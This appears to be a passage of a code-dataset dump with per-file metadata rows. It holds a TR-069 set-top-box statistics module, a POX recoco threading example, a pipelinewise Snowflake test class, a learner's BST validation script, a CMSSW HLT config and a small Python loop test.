return len(self.ClientGroupList)
@tr.session.cache_as_list
def _ParseProcIgmp(self):
"""Get the list of multicast groups subscribed to.
/proc/net/igmp uses an unusual format:
Idx Device : Count Querier Group Users Timer Reporter
1 lo : 1 V3
010000E0 1 0:00000000 0
2 eth0 : 1 V3
010000E0 1 0:00000000 0
010000E0 is the IP multicast address as a hex number, and always
big endian.
Returns:
a list of strings of the IP addresses of current IGMP group memberships.
"""
igmp4s = set()
igmp6s = set()
with open(PROCNETIGMP, 'r') as f:
for line in f:
result = IGMPREGEX.match(line)
if result is not None:
igmp = result.group(1).strip()
igmp4s.add(UnpackAlanCoxIP(igmp))
with open(PROCNETIGMP6, 'r') as f:
for line in f:
result = IGMP6REGEX.match(line)
if result is not None:
igmp = result.group(1).strip()
ip6 = ':'.join([igmp[0:4], igmp[4:8], igmp[8:12], igmp[12:16],
igmp[16:20], igmp[20:24], igmp[24:28], igmp[28:]])
igmp6s.add(socket.inet_ntop(
socket.AF_INET6, socket.inet_pton(socket.AF_INET6, ip6)))
return sorted(list(igmp4s)) + sorted(list(igmp6s))
@tr.session.cache
def _UpdateClientGroups(self):
"""Maintain stable instance numbers for ClientGroups."""
igmps = self._ParseProcIgmp()
num_igmps = len(igmps)
new_igmps = dict()
old_igmps = self._ClientGroups
# Existing ClientGroups keep their instance number in self._ClientGroups
for instance, old_ipaddr in old_igmps.items():
if old_ipaddr in igmps:
new_igmps[instance] = old_ipaddr
igmps.remove(old_ipaddr)
# Remaining stream_ids claim an unused instance number in 1..num_streams
assigned = set(new_igmps.keys())
unassigned = set(range(1, num_igmps + 1)) - assigned
for ipaddr in igmps:
instance = unassigned.pop()
new_igmps[instance] = ipaddr
self._ClientGroups = new_igmps
def GetClientGroup(self, ipaddr):
return ClientGroup(ipaddr)
def IterClientGroups(self):
"""Retrieves an iterable list of ClientGroups."""
self._UpdateClientGroups()
for key, ipaddr in self._ClientGroups.items():
yield str(key), self.GetClientGroup(ipaddr)
@tr.session.cache
def GetClientGroupByIndex(self, index):
"""Directly access the value corresponding to a given key."""
self._UpdateClientGroups()
return self.GetClientGroup(self._ClientGroups[index])
class ClientGroup(BASE135STB.Components.FrontEnd.IP.IGMP.ClientGroup):
"""STBService.{i}.Components.FrontEnd.{i}.IP.IGMP.ClientGroup.{i}."""
GroupAddress = tr.cwmptypes.ReadOnlyString('')
def __init__(self, ipaddr):
super(ClientGroup, self).__init__()
self.Unexport(['Alias', 'UpTime'])
type(self).GroupAddress.Set(self, ipaddr)
class HDMI(BASE135STB.Components.HDMI):
"""STBService.{i}.Components.HDMI."""
ResolutionMode = tr.cwmptypes.ReadOnlyString('Auto')
def __init__(self):
super(HDMI, self).__init__()
self.Unexport(['Alias', 'Enable', 'Name', 'Status'])
self._UpdateStats()
@tr.session.cache
def _UpdateStats(self):
"""Read data in from JSON files."""
data = dict()
try:
filename = HDMI_STATS_FILE
with open(filename) as f:
d = json.load(f)
data.update(d['HDMIStats'])
except IOError:
# Its normal for the file to go away when the HDMI is not active.
pass
except (ValueError, KeyError) as e:
# ValueError - JSON file is malformed and cannot be decoded
# KeyError - Decoded JSON file doesn't contain the required fields.
print('HDMIStats: Failed to read stats from file {0}, '
'error = {1}'.format(filename, e))
self.data = data
@property
def DisplayDevice(self):
return HDMIDisplayDevice()
@property
def ResolutionValue(self):
self._UpdateStats()
return self.data.get('ResolutionValue', '')
class HDMIDisplayDevice(CATA135STB.Components.HDMI.DisplayDevice):
"""STBService.{i}.Components.HDMI.{i}.DisplayDevice."""
def __init__(self):
super(HDMIDisplayDevice, self).__init__()
self.Unexport(['CECSupport'])
self.data = self._UpdateStats()
@tr.session.cache
def _UpdateStats(self):
data = dict()
for wildcard in HDMI_DISPLAY_DEVICE_STATS_FILES:
for filename in glob.glob(wildcard):
try:
with open(filename) as f:
d = json.load(f)
data.update(d['HDMIDisplayDevice'])
except IOError:
# Its normal for the file to go away when the HDMI is not active.
pass
except (ValueError, KeyError) as e:
# ValueError - JSON file is malformed and cannot be decoded
# KeyError - Decoded JSON file doesn't contain the required fields.
print('HDMIDisplayDevice: Failed to read stats from file {0}, '
'error = {1}'.format(filename, e))
return data
@property
def Status(self):
return self.data.get('Status', 'None')
@property
def Name(self):
return self.data.get('Name', '')
@property
def SupportedResolutions(self):
supported = self.data.get('SupportedResolutions', None)
if supported:
# There can be duplicates in the supported list.
supportedset = set(supported)
return ', '.join(sorted(supportedset))
else:
return ''
@property
def EEDID(self):
return self.data.get('EEDID', '')
@property
def X_GOOGLE_COM_EDIDExtensions(self):
extensions = self.data.get('EDIDExtensions', None)
if extensions:
return ', '.join(extensions)
else:
return ''
@property
def PreferredResolution(self):
return self.data.get('PreferredResolution', '')
@property
def VideoLatency(self):
return self.data.get('VideoLatency', 0)
@property
def AutoLipSyncSupport(self):
return self.data.get('AutoLipSyncSupport', False)
@property
def HDMI3DPresent(self):
return self.data.get('HDMI3DPresent', False)
@property
def X_GOOGLE_COM_NegotiationCount4(self):
return self.data.get('Negotiations4hr', 0)
@property
def X_GOOGLE_COM_NegotiationCount24(self):
return self.data.get('Negotiations24hr', 0)
@property
def X_GOOGLE_COM_HDCPAuthFailureCnt(self):
return self.data.get('HDCPAuthFailureCnt', 0)
@property
def X_GOOGLE_COM_VendorId(self):
return self.data.get('VendorId', '')
@property
def X_GOOGLE_COM_ProductId(self):
return self.data.get('ProductId', 0)
@property
def X_GOOGLE_COM_MfgYear(self):
return self.data.get('MfgYear', 1990)
@property
def X_GOOGLE_COM_LastUpdateTimestamp(self):
return tr.cwmpdate.format(float(self.data.get('LastUpdateTime', 0)))
class ServiceMonitoring(CATA135STB.ServiceMonitoring):
"""STBService.{i}.ServiceMonitoring."""
X_CATAWAMPUS_ORG_StallAlarmResetTime = tr.cwmptypes.Unsigned()
X_CATAWAMPUS_ORG_StallAlarmValue = tr.cwmptypes.Unsigned()
def __init__(self, ioloop=None):
super(ServiceMonitoring, self).__init__()
self._ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self.Unexport(['FetchSamples', 'ForceSample', 'ReportEndTime',
'ReportSamples', 'ReportStartTime', 'SampleEnable',
'SampleInterval', 'SampleState', 'TimeReference',
'EventsPerSampleInterval'])
self.Unexport(objects=['GlobalOperation'])
self.stall_alarm_time = 0.0
self.stall_alarm_reset_handler = None
self.X_CATAWAMPUS_ORG_StallAlarmResetTime = 45 * 60
self.X_CATAWAMPUS_ORG_StallAlarmValue = 0
self.MainStreamList = {}
for x in range(1, 9):
self.MainStreamList[x] = MainStream(x)
# client-only MainStreams.
self.MainStreamList[256] = MainStream(256)
@property
def MainStreamNumberOfEntries(self):
return len(self.MainStreamList)
def _StallAlarmReset(self):
self.stall_alarm_time = 0.0
self.stall_alarm_reset_handler = None
def _CheckForStall(self):
for ms in self.MainStreamList.values():
mcast = ms.Total.X_CATAWAMPUS_ORG_MulticastStats
threshold = self.X_CATAWAMPUS_ORG_StallAlarmValue
if threshold and (mcast.StallTime > threshold):
return True
return False
def GetAlarmTime(self):
if not self.stall_alarm_time and self._CheckForStall():
self.stall_alarm_time = TIMENOW()
seconds = self.X_CATAWAMPUS_ORG_StallAlarmResetTime
self.stall_alarm_reset_handler = self._ioloop.add_timeout(
datetime.timedelta(seconds=seconds), self._StallAlarmReset)
return tr.cwmpdate.format(self.stall_alarm_time)
def SetAlarmTime(self, value):
# We don't allow writing arbitrary time. Any write clears the alarm.
self.stall_alarm_time = 0.0
X_CATAWAMPUS_ORG_StallAlarmTime = property(
GetAlarmTime, SetAlarmTime, None,
'X_CATAWAMPUS_ORG_StallAlarmTime')
class MainStream(BASE135STB.ServiceMonitoring.MainStream):
"""STBService.{i}.ServiceMonitoring.MainStream."""
def __init__(self, idx):
super(MainStream, self).__init__()
self.Unexport(['AVStream', 'Enable', 'Gmin', 'ServiceType',
'SevereLossMinDistance', 'SevereLossMinLength', 'Status',
'ChannelChangeFailureTimeout', 'Alias'])
self.Unexport(objects=['Sample'])
self.Total = Total(idx)
class Total(CATA135STBTOTAL):
"""STBService.{i}.ServiceMonitoring.MainStream.{i}.Total."""
def __init__(self, idx):
super(Total, self).__init__()
self.idx = idx
self.Unexport(['Reset', 'ResetTime', 'TotalSeconds'])
self.Unexport(objects=['AudioDecoderStats', 'RTPStats',
'VideoDecoderStats', 'VideoResponseStats'])
self.data = {}
self.udp = {}
@property
def DejitteringStats(self):
self._UpdateStats()
return DejitteringStats(self.data.get('DejitteringStats', {}))
@property
def MPEG2TSStats(self):
self._UpdateStats()
return MPEG2TSStats(self.data.get('MPEG2TSStats', {}))
@property
def TCPStats(self):
self._UpdateStats()
return TCPStats(self.data.get('TCPStats', {}))
@property
def X_CATAWAMPUS_ORG_MulticastStats(self):
self._UpdateStats()
return MulticastStats(self.data.get('MulticastStats', {}), self.udp)
@property
def X_CATAWAMPUS_ORG_DecoderStats(self):
self._UpdateStats()
return DecoderStats(self.data.get('DecoderStats', {}))
@tr.session.cache
def _UpdateProcNetUDP(self, udp):
"""Parse /proc/net/udp.
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt
464: 010002E1:07D0 00000000:0000 07 00000000:00000000 00:00000000 00000000
uid timeout inode ref pointer drops
0 0 6187 2 b1f64e00 0
Args:
udp: a dict to store the parsed (rxq, drops) fields in.
"""
with open(PROCNETUDP) as f:
for line in f:
try:
line = ' '.join(line.split())
fields = re.split('[ :]', line)
ip = UnpackAlanCoxIP(fields[2])
port = int(fields[3], 16)
key = '%s:%d' % (ip, port)
udp[key] = (int(fields[8], 16), int(fields[17])) # rxq, drops
except (ValueError, IndexError):
# comment line, or something
continue
@tr.session.cache
def _UpdateTotalStats(self, data):
"""Read stats in from JSON files."""
for pattern in CONT_MONITOR_FILES:
filename = pattern % self.idx
try:
with open(filename) as f:
d = json.load(f)
data.update(d['STBService'][0]['MainStream'][0])
except IOError:
# This is normal, file only exists if it is actively being used.
pass
except (ValueError, KeyError) as e:
# ValueError - JSON file is malformed and cannot be decoded
# KeyError - Decoded JSON file doesn't contain the required fields.
print('ServiceMonitoring: Failed to read stats from file {0}, '
'error = {1}'.format(filename, e))
@tr.session.cache
def _UpdateStats(self):
self.data = {}
self._UpdateTotalStats(self.data)
self.udp = {}
self._UpdateProcNetUDP(self.udp)
class DejitteringStats(BASE135STB.ServiceMonitoring.MainStream.Total.
DejitteringStats):
"""STBService.{i}.ServiceMonitoring.MainStream.{i}.Total.DejitteringStats."""
def __init__(self, data):
super(DejitteringStats, self).__init__()
self.data = data
self.Unexport(['TotalSeconds'])
@property
def EmptyBufferTime(self):
return int(self.data.get('EmptyBufferTime', 0))
@property
def Overruns(self):
return int(self.data.get('Overruns', 0))
@property
def Underruns(self):
return int(self.data.get('Underruns', 0))
@property
def X_GOOGLE_COM_SessionID(self):
return int(self.data.get('SessionId', 0))
class MPEG2TSStats(CATA135STB.ServiceMonitoring.MainStream.Total.MPEG2TSStats):
"""STBService.{i}.ServiceMonitoring.MainStream.{i}.Total.MPEG2TSStats."""
def __init__(self, data):
super(MPEG2TSStats, self).__init__()
self.data = data
self.Unexport(['PacketDiscontinuityCounterBeforeCA',
'TSSyncByteErrorCount', 'TSSyncLossCount', 'TotalSeconds'])
@property
def PacketDiscontinuityCounter(self):
return int(self.data.get('PacketDiscontinuityCounter', 0))
@property
def TSPacketsReceived(self):
return int(self.data.get('TSPacketsReceived', 0))
@property
def X_CATAWAMPUS_ORG_DropBytes(self):
return int(self.data.get('DropBytes', 0))
@property
def X_CATAWAMPUS_ORG_DropPackets(self):
return int(self.data.get('DropPackets', 0))
@property
def X_CATAWAMPUS_ORG_PacketErrorCount(self):
return int(self.data.get('PacketErrorCount', 0))
class TCPStats(CATA135STB.ServiceMonitoring.MainStream.Total.TCPStats):
"""STBService.{i}.ServiceMonitoring.MainStream.{i}.Total.TCPStats."""
def __init__(self, data):
super(TCPStats, self).__init__()
self.data = data
self.Unexport(['TotalSeconds'])
@property
def BytesReceived(self):
return long(self.data.get('BytesReceived', 0))
@property
def PacketsReceived(self):
return long(self.data.get('PacketsReceived', 0))
@property
def PacketsRetransmitted(self):
return long(self.data.get('TotalRetransmits', 0))
@property
def X_CATAWAMPUS_ORG_BytesSent(self):
return long(self.data.get('BytesSent', 0))
@property
def X_CATAWAMPUS_ORG_Cwnd(self):
return long(self.data.get('Cwnd', 0))
@property
def X_CATAWAMPUS_ORG_SlowStartThreshold(self):
return long(self.data.get('SSThresh', 0))
@property
def X_CATAWAMPUS_ORG_Unacked(self):
return long(self.data.get('Unacked', 0))
@property
def X_CATAWAMPUS_ORG_Sacked(self):
return long(self.data.get('Sacked', 0))
@property
def X_CATAWAMPUS_ORG_Lost(self):
return long(self.data.get('Lost', 0))
@property
def X_CATAWAMPUS_ORG_Rtt(self):
return long(self.data.get('Rtt', 0))
@property
def X_CATAWAMPUS_ORG_RttVariance(self):
return long(self.data.get('RttVariance', 0))
@property
def X_CATAWAMPUS_ORG_ReceiveRTT(self):
return long(self.data.get('ReceiveRTT', 0))
@property
def X_CATAWAMPUS_ORG_ReceiveSpace(self):
return long(self.data.get('ReceiveSpace', 0))
@property
def X_CATAWAMPUS_ORG_RetransmitTimeout(self):
return long(self.data.get('RetransTimeout', 0))
class MulticastStats(CATA135STBTOTAL.X_CATAWAMPUS_ORG_MulticastStats):
"""ServiceMonitoring.MainStream.{i}.Total.X_CATAWAMPUS_ORG_MulticastStats."""
def __init__(self, data, udp):
super(MulticastStats, self).__init__()
self.data = data
self.udp = udp
@property
def BPS(self):
return int(self.data.get('bps', 0))
@property
def MulticastGroup(self):
return str(self.data.get('MulticastGroup', ''))
@property
def StallTime(self):
stalled = long(self.data.get('StalledUsecs', 0))
return int(stalled / 1000)
@property
def StartupLatency(self):
latency = long(self.data.get('StartupLagUsecs', 0))
return int(latency / 1000)
@property
def MissedSchedule(self):
schedule = int(self.data.get('MissingSchedule', 0))
return schedule
@property
def UdpRxQueue(self):
(rxq, _) = self.udp.get(self.MulticastGroup, (0, 0))
return rxq
@property
def UdpDrops(self):
(_, drops) = self.udp.get(self.MulticastGroup, (0, 0))
return drops
class ProgMetadata(CATA135STB.X_CATAWAMPUS_ORG_ProgramMetadata):
"""STBService.{i}.X_CATAWAMPUS_ORG_ProgramMetadata."""
def __init__(self):
super(ProgMetadata, self).__init__()
@property
def EPG(self):
return EPG()
class DecoderStats(CATA135STBTOTAL.X_CATAWAMPUS_ORG_DecoderStats):
"""ServiceMonitoring.MainStream.{i}.Total.X_CATAWAMPUS_ORG_DecoderStats."""
def __init__(self, data):
super(DecoderStats, self).__init__()
self.data = data
@property
def VideoBytesDecoded(self):
return long(self.data.get('VideoBytesDecoded', 0))
@property
def DecodeDrops(self):
return long(self.data.get('DecodeDrops', 0))
@property
def VideoDecodeErrors(self):
return long(self.data.get('VideoDecodeErrors', 0))
@property
def DecodeOverflows(self):
return long(self.data.get('DecodeOverflows', 0))
@property
def DecodedPictures(self):
return long(self.data.get('DecodedPictures', 0))
@property
def DisplayDrops(self):
return long(self.data.get('DisplayDrops', 0))
@property
def DisplayErrors(self):
return long(self.data.get('DisplayErrors', 0))
@property
def DisplayUnderflows(self):
return long(self.data.get('DisplayUnderflows', 0))
@property
def DisplayedPictures(self):
return long(self.data.get('DisplayedPictures', 0))
@property
def ReceivedPictures(self):
return long(self.data.get('ReceivedPictures', 0))
@property
def VideoWatchdogs(self):
return long(self.data.get('VideoWatchdogs', 0))
@property
def VideoPtsStcDifference(self):
return long(self.data.get('VideoPtsStcDifference', 0))
@property
def VideoFifoDepth(self):
return long(self.data.get('VideoFifoDepth', 0))
@property
def VideoDisplayQueueDepth(self):
return long(self.data.get('VideoDisplayQueueDepth', 0))
@property
def VideoCabacQueueDepth(self):
return long(self.data.get('VideoCabacQueueDepth', 0))
@property
def VideoEnhancementFifoDepth(self):
return long(self.data.get('VideoEnhancementFifoDepth', 0))
@property
def VideoPts(self):
return long(self.data.get('VideoPts', 0))
@property
def AudioDecodedFrames(self):
return long(self.data.get('AudioDecodedFrames', 0))
@property
def AudioDecodeErrors(self):
return long(self.data.get('AudioDecodeErrors', 0))
@property
def AudioDummyFrames(self):
return long(self.data.get('AudioDummyFrames', 0))
@property
def AudioFifoOverflows(self):
return long(self.data.get('AudioFifoOverflows', 0))
@property
def AudioFifoUnderflows(self):
return long(self.data.get('AudioFifoUnderflows', 0))
@property
def AudioWatchdogs(self):
return long(self.data.get('AudioWatchdogs', 0))
@property
def AudioBytesDecoded(self):
return long(self.data.get('AudioBytesDecoded', 0))
@property
def AudioPtsStcDifference(self):
return long(self.data.get('AudioPtsStcDifference', 0))
@property
def AudioFifoDepth(self):
return long(self.data.get('AudioFifoDepth', 0))
@property
def AudioQueuedFrames(self):
return long(self.data.get('AudioQueuedFrames', 0))
@property
def AudioPts(self):
return long(self.data.get('AudioPts', 0))
@property
def AudioVideoPtsDifference(self):
audio_pts = long(self.data.get('AudioPts', 0))
video_pts = long(self.data.get('VideoPts', 0))
if audio_pts is not None and video_pts is not None:
return audio_pts - video_pts
else:
return 0
class EPG(CATA135STB.X_CATAWAMPUS_ORG_ProgramMetadata.EPG):
"""STBService.{i}.X_CATAWAMPUS_ORG_ProgramMetadata.EPG."""
def __init__(self):
super(EPG, self).__init__()
self.data = self._GetStats()
@tr.session.cache
def _GetStats(self):
"""Generate stats object from the JSON stats."""
data = dict()
for wildcard in EPG_STATS_FILES:
for filename in glob.glob(wildcard):
try:
with open(filename) as f:
d = json.load(f)
data.update(d['EPGStats'])
# IOError - Failed to open file or failed to read from file
# ValueError - JSON file is malformed and cannot be decoded
# KeyError - Decoded JSON file doesn't contain the required fields.
except (IOError, ValueError, KeyError) as e:
print('EPGStats: Failed to read stats from file {0}, '
'error = {1}'.format(filename, e))
return data
@property
def MulticastPackets(self):
return self.data.get('MulticastPackets', 0)
@property
def EPGErrors(self):
return self.data.get('EPGErrors', 0)
@property
def LastReceivedTime(self):
last = self.data.get('LastReceivedTime', 0)
return tr.cwmpdate.format(float(last))
@property
def EPGExpireTime(self):
return tr.cwmpdate.format(float(self.data.get('EPGExpireTime', 0)))
@property
def NumChannels(self):
return self.data.get('NumChannels', 0)
@property
def NumEnabledChannels(self):
return self.data.get('NumEnabledChannels', 0)
| 30.130387 | 80 | 0.684282 | 3,211 | 27,268 | 5.674245 | 0.191218 | 0.045664 | 0.051921 | 0.03787 | 0.333754 | 0.26191 | 0.132931 | 0.116026 | 0.100165 | 0.085895 | 0 | 0.023868 | 0.1918 | 27,268 | 904 | 81 | 30.163717 | 0.802886 | 0.158281 | 0 | 0.310789 | 0 | 0.003221 | 0.147689 | 0.049171 | 0 | 0 | 0 | 0 | 0 | 1 | 0.204509 | false | 0.004831 | 0.022544 | 0.127214 | 0.433172 | 0.006441 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
828afbc2fe5be25ab141deafcff81cbc4e9d4a57 | 2,827 | py | Python | Internetworking Distributed Project/finalProject/ovs/pox-master/pox/lib/recoco/examples.py | supriyasingh01/github_basics | 8aa93f783cfe347368763ef31be5ab59fe8476a1 | [
"CC0-1.0"
] | null | null | null | Internetworking Distributed Project/finalProject/ovs/pox-master/pox/lib/recoco/examples.py | supriyasingh01/github_basics | 8aa93f783cfe347368763ef31be5ab59fe8476a1 | [
"CC0-1.0"
] | null | null | null | Internetworking Distributed Project/finalProject/ovs/pox-master/pox/lib/recoco/examples.py | supriyasingh01/github_basics | 8aa93f783cfe347368763ef31be5ab59fe8476a1 | [
"CC0-1.0"
] | null | null | null | # Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
These are example uses of the recoco cooperative threading library. Hopefully
they will save time for developers getting used to the POX environment.
I can't seem to find any documentation on recoco on the web. Maybe
Murphy rolled recoco himself?
"""
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.revent import *
from pox.lib.recoco import *
class EventLoopExample (Task):
"""
Suppose we have a component of our application that uses it's own event
loop. recoco allows us to "add" our select loop to the other event
loops running within pox.
First note that we inherit from Task. The Task class is recoco's equivalent
of python's threading.thread interface.
"""
def __init__(self):
Task.__init__(self) # call our superconstructor
self.sockets = self.get_sockets() # ... the sockets to listen to events on
# Note! We can't start our event loop until the core is up. Therefore,
# we'll add an event handler.
core.addListener(pox.core.GoingUpEvent, self.start_event_loop)
def start_event_loop(self, event):
"""
Takes a second parameter: the GoingUpEvent object (which we ignore)
"""
# This causes us to be added to the scheduler's recurring Task queue
Task.start(self)
def get_sockets(self):
return []
def handle_read_events(self):
pass
def run(self):
"""
run() is the method that gets called by the scheduler to execute this task
"""
while core.running:
"""
This looks almost exactly like python's select.select, except that it's
it's handled cooperatively by recoco
The only difference in Syntax is the "yield" statement, and the
capital S on "Select"
"""
rlist,wlist,elist = yield Select(self.sockets, [], [], 3)
events = []
for read_sock in rlist:
if read_sock in self.sockets:
events.append(read_sock)
if events:
self.handle_read_events() # ...
"""
And that's it!
TODO: write example usages of the other recoco BlockingTasks, e.g. recoco.Sleep
"""
| 31.764045 | 79 | 0.68907 | 422 | 2,827 | 4.563981 | 0.469194 | 0.01298 | 0.020249 | 0.029595 | 0.042575 | 0.029076 | 0 | 0 | 0 | 0 | 0 | 0.003711 | 0.237354 | 2,827 | 88 | 80 | 32.125 | 0.88961 | 0.547931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0 | 1 | 0.208333 | false | 0.041667 | 0.166667 | 0.041667 | 0.458333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
82b3588bd78fb793c50f21d12d76d2ac2e2106e8 | 540 | py | Python | tests/end_to_end/target_snowflake/tap_s3/__init__.py | thread/pipelinewise | 835fe6f0fe5de810f9beab9ce30214c5a9bfdbe1 | [
"Apache-2.0"
] | null | null | null | tests/end_to_end/target_snowflake/tap_s3/__init__.py | thread/pipelinewise | 835fe6f0fe5de810f9beab9ce30214c5a9bfdbe1 | [
"Apache-2.0"
] | null | null | null | tests/end_to_end/target_snowflake/tap_s3/__init__.py | thread/pipelinewise | 835fe6f0fe5de810f9beab9ce30214c5a9bfdbe1 | [
"Apache-2.0"
] | null | null | null | import pytest
from tests.end_to_end.helpers.env import E2EEnv
from tests.end_to_end.target_snowflake import TargetSnowflake
@pytest.mark.skipif(not E2EEnv.env['TAP_S3_CSV']['is_configured'], reason='S3 not configured.')
class TapS3(TargetSnowflake):
"""
Base class for E2E tests for tap S3 -> target snowflake
"""
# pylint: disable=arguments-differ
def setUp(self, tap_id: str, target_id: str):
super().setUp(tap_id=tap_id, target_id=target_id, tap_type='TAP_S3_CSV')
self.e2e_env.setup_tap_s3_csv()
| 31.764706 | 95 | 0.731481 | 83 | 540 | 4.506024 | 0.445783 | 0.053476 | 0.064171 | 0.074866 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021882 | 0.153704 | 540 | 16 | 96 | 33.75 | 0.796499 | 0.164815 | 0 | 0 | 0 | 0 | 0.117241 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
82b7470b514922a782af74d12b667ff6f9be2529 | 1,345 | py | Python | Chapter4_Trees_And_Graphs/p5_validate_BST.py | howardwkim/CTCI | de3cfcdf73f940df9e9782cc7fc49cfc115c48bc | [
"BSD-2-Clause"
] | null | null | null | Chapter4_Trees_And_Graphs/p5_validate_BST.py | howardwkim/CTCI | de3cfcdf73f940df9e9782cc7fc49cfc115c48bc | [
"BSD-2-Clause"
] | null | null | null | Chapter4_Trees_And_Graphs/p5_validate_BST.py | howardwkim/CTCI | de3cfcdf73f940df9e9782cc7fc49cfc115c48bc | [
"BSD-2-Clause"
] | null | null | null | from Tree import Tree
from Tree import BinaryNode as Node
# def validate_BST(root):
# prev = None
# return validate_BST_helper(root, prev)
#
# def validate_BST_helper(root, prev):
# if root is not None:
# if prev is None:
# prev = root.data
# return validate_BST_helper(root.left, prev) and \
# visited(root, prev) and \
# validate_BST_helper(root.right, prev)
#
# def visited(root, prev):
# if prev > root.data:
# return False
# else: #prev <= root.data
# return True
def validate_BST(root):
prev = None
return validate_BST_helper(root, prev)
def validate_BST_helper(root, prev):
if root is None:
return True
if not validate_BST_helper(root.left, prev):
return False
if prev is not None and root.data <= prev:
return False
prev = root.data
if not validate_BST_helper(root.right, prev):
return False
return True
def validate_BST2(root):
return validate_BST2_helper(root, min=None, max=None)
def validate_BST2_helper(root, min, max):
return
n2 = Node(2)
n3 = Node(3)
n4 = Node(4)
n5 = Node(5)
n6 = Node(6)
n7 = Node(7)
n8 = Node(8)
n5.left = n3
n5.right = n7
n3.left = n2
n3.right = n4
n7.left = n6
n7.right = n8
my_tree = Tree(n5)
print validate_BST(my_tree.root) | 19.779412 | 59 | 0.63197 | 204 | 1,345 | 4.039216 | 0.215686 | 0.146845 | 0.165049 | 0.203884 | 0.449029 | 0.381068 | 0.225728 | 0.225728 | 0.225728 | 0.225728 | 0 | 0.030364 | 0.265428 | 1,345 | 68 | 60 | 19.779412 | 0.803644 | 0.348699 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057143 | null | null | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
82b8705a4ba9c5f0900f9054e8db034981c8e6cd | 275 | py | Python | HLTriggerOffline/Higgs/python/HiggsValidation_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | HLTriggerOffline/Higgs/python/HiggsValidation_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | HLTriggerOffline/Higgs/python/HiggsValidation_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from HLTriggerOffline.Higgs.hltHiggsValidator_cfi import *
HiggsValidationSequence = cms.Sequence(
hltHiggsValidator
)
#HLTHiggsVal_FastSim = cms.Sequence(
# recoHiggsValidationHLTFastSim_seq +
# hltHiggsValidator
# )
| 21.153846 | 58 | 0.792727 | 23 | 275 | 9.347826 | 0.73913 | 0.102326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141818 | 275 | 12 | 59 | 22.916667 | 0.911017 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
82cbe3bc779f262884a98566a2fbe13d0d4eb9a9 | 57 | py | Python | tests/library/python/for.py | chrisseaton/katahdin | 5746e3a6dab10749815af59202dbaf28595d6e1b | [
"Unlicense"
] | 115 | 2015-01-20T08:25:15.000Z | 2022-03-19T18:10:08.000Z | tests/library/python/for.py | chrisseaton/katahdin | 5746e3a6dab10749815af59202dbaf28595d6e1b | [
"Unlicense"
] | null | null | null | tests/library/python/for.py | chrisseaton/katahdin | 5746e3a6dab10749815af59202dbaf28595d6e1b | [
"Unlicense"
] | 9 | 2015-08-16T02:51:35.000Z | 2021-11-20T22:34:55.000Z | x = 0
for n in range(10):
x = x + 1
assert x == 10
